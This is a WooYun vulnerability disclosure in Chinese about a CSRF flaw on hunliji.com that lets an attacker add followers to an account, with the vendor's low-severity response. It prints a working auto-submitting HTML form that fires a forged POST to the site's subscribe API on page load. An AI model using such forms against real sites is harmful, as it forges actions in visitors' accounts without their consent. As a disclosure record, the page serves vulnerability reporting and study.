当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0111982
漏洞标题:
婚礼纪CSRF可刷粉丝
相关厂商:
hunliji.com
漏洞作者:
路人甲
提交时间:
2015-05-04 17:22
修复时间:
2015-06-19 13:56
公开时间:
2015-06-19 13:56
漏洞类型:
CSRF
危害等级:
自评Rank:
5
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

如题

详细说明:

1、居然能关注自己,既然可以关注自己就用自己的号码测试了 - -。关注抓包

1.png


2、构造payload

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CSRF TEST</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "3036" );
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);
}
function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://www.hunliji.com:80/v1/api/app/subscriptions/subscribe.json">
<input type="hidden" name="user_id" value="841425"/> 
</form>
</body>
</html>


3、

2.png


4、

3.png


5、配合之前的任意用户发帖,用排名较高的用户发,涨粉应该很快

漏洞证明:

修复方案:

送个喜字吧 = =。

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-05-05 13:55

厂商回复:

非常感谢作者对我们信息安全的帮助。

最新状态:

2015-05-12:能涨1粉,漏洞暂不处理,非常感谢作者对我们信息安全的帮助